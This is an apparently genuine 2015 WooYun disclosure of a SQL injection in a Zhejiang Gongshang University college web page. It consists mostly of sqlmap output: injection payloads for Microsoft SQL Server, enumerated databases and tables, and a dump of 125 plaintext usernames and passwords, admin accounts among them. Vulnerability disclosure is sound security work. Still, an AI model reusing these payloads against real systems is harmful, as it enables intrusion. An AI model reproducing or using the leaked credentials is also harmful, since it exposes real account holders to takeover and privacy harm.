当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153544

漏洞标题:浙江工商大学存在sql注入漏洞,表儿多的我都数不清了

相关厂商:CCERT教育网应急响应组

漏洞作者: 喵星人不会飞

提交时间:2015-11-11 16:07

修复时间:2015-11-24 13:00

公开时间:2015-11-24 13:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

计算机学院的洞,好吧。表太多了,自己确认下有没有核心数据吧

详细说明:

http://**.**.**.**/ciecol/web/kcjs_detail.jsp?id=28


漏洞证明:

sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=131 AND 5029=5029
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: id=-7999 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(107)+CHAR(108)+CHAR(67)+CHAR(73)+CHAR(98)+CHAR(109)+CHAR(105)+CHAR(115)+CHAR(81)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113),NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=131; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=131 WAITFOR DELAY '0:0:5'--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] ciedb
[*] jxxy
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: ciedb
[49 tables]
+-------------------+
| AdminACL |
| AdminACL |
| Dyml |
| Ejml |
| Xsml |
| Yjml |
| Zc |
| bgnw_jxdg |
| bgnw_jxjh |
| bgnw_xqrw |
| bkjx_kcjs |
| bkjx_zyjs |
| candidate |
| courseinfor |
| cybgxztype |
| deptinfor |
| dlxt |
| dtproperties |
| infolink |
| infolink |
| js_xwd_map |
| jsfc_temp2 |
| jsfc_temp2 |
| jsfc_temp3 |
| lxwm |
| notice |
| question |
| record |
| result |
| studentinfor |
| subjectinfor |
| sysconstraints |
| syssegments |
| systeminfor |
| t_jiaozhu |
| teacherlogin |
| userinfor_teacher |
| userinfor_teacher |
| voteresult |
| xkky_zdxk |
| xygk_jsfc |
| xygk_xrld |
| xygk_xyjj |
| xyjg |
| xyldmail |
| yjs_xwd |
| yqlj |
| zwdy |
| zwdy |
+-------------------+


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: jxxy
Table: Users
[9 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| answer | varchar |
| ID | int |
| msrepl_tran_version | uniqueidentifier |
| note | varchar |
| password | varchar |
| privilege | varchar |
| question | varchar |
| type | int |
| username | varchar |
+---------------------+------------------+


web server operating system: Linux Ubuntu
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2000
Database: jxxy
Table: Users
[125 entries]
+----------+-------------+
| username | password |
+----------+-------------+
| 1201300 | .3698741025 |
| 1216600 | 040206 |
| 1216700 | 09158579 |
| 1217100 | 1103087 |
| 1200100 | 1200100 |
| 1200200 | 1200200 |
| 1200300 | 1200300 |
| 1200400 | 1200400 |
| 1200700 | 1200700 |
| 1200900 | 1200900 |
| 1201000 | 1201000 |
| 1201100 | 1201100 |
| 1201200 | 1201200 |
| 1201600 | 1201600 |
| 1201800 | 1201800 |
| 1202100 | 1202100 |
| 1202400 | 1202400 |
| 1202500 | 1202500 |
| 1202600 | 1202600 |
| 1202800 | 1202800 |
| 1203000 | 1203000 |
| 1203200 | 1203200 |
| 1203300 | 1203300 |
| 1203400 | 1203400 |
| 1203500 | 1203500 |
| 1203600 | 1203600 |
| 1203700 | 1203700 |
| 1203800 | 1203800 |
| 1203900 | 1203900 |
| 1204400 | 1204400 |
| 1204700 | 1204700 |
| 1204800 | 1204800 |
| 1204900 | 1204900 |
| 1205000 | 1205000 |
| 1205100 | 1205100 |
| 1205200 | 1205200 |
| 1205300 | 1205300 |
| 1205400 | 1205400 |
| 1205600 | 1205600 |
| 1205700 | 1205700 |
| 1205800 | 1205800 |
| 1206000 | 1206000 |
| 1206500 | 1206500 |
| 1206600 | 1206600 |
| 1206700 | 1206700 |
| 1206900 | 1206900 |
| 1207100 | 1207100 |
| 1207300 | 1207300 |
| 1207400 | 1207400 |
| 1207600 | 1207600 |
| 1207700 | 1207700 |
| 1207800 | 1207800 |
| 1207900 | 1207900 |
| 1208000 | 1208000 |
| 1208100 | 1208100 |
| 1208400 | 1208400 |
| 1208500 | 1208500 |
| 1208800 | 1208800 |
| 1208900 | 1208900 |
| 1209200 | 1209200 |
| 1209300 | 1209300 |
| 1209400 | 1209400 |
| 1209500 | 1209500 |
| 1209600 | 1209600 |
| 1209800 | 1209800 |
| 1209900 | 1209900 |
| 1210000 | 1210000 |
| 1210100 | 1210100 |
| 1210200 | 1210200 |
| 1210300 | 1210300 |
| 1210400 | 1210400 |
| 1210500 | 1210500 |
| 1210800 | 1210800 |
| 1210900 | 1210900 |
| 1211000 | 1211000 |
| 1211100 | 1211100 |
| 1211200 | 1211200 |
| 1211300 | 1211300 |
| 1211800 | 1211800 |
| 1211900 | 1211900 |
| 1212000 | 1212000 |
| 1212200 | 1212200 |
| 1212300 | 1212300 |
| 1212400 | 1212400 |
| 1212900 | 1212900 |
| 1213000 | 1213000 |
| 1213100 | 1213100 |
| 1213300 | 1213300 |
| 1213400 | 1213400 |
| 1213500 | 1213500 |
| 1213600 | 1213600 |
| 1213700 | 1213700 |
| 1213800 | 1213800 |
| 1213900 | 1213900 |
| 1214000 | 1214000 |
| 1214100 | 1214100 |
| 1214300 | 1214300 |
| 1214600 | 1214600 |
| 1214700 | 1214700 |
| 1214800 | 1214800 |
| 1215100 | 1215100 |
| 1215200 | 1215200 |
| 1216100 | 1216100 |
| 1216200 | 1216200 |
| 1216400 | 1216400 |
| 1216800 | 1216800 |
| 1216900 | 1216900 |
| 1214400 | 198343 |
| 2505200 | 2505200 |
| 2506400 | 2506400 |
| admin3 | 28008309 |
| 1212700 | 301110 |
| 1213200 | 51life |
| 1201900 | 611511 |
| 1203100 | 626311 |
| 1202300 | 717102 |
| 1215300 | 790406 |
| 1204500 | 826631 |
| admin2 | admin2 |
| admin5 | admin5 |
| 1216300 | arealman |
| chen | chen |
| 1214500 | dg0615015 |
| 1216000 | enose173 |
| 1217000 | p801130 |
+----------+-------------+


修复方案:

过滤

版权声明:转载请注明来源 喵星人不会飞@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-24 13:00

厂商回复:

最新状态:

暂无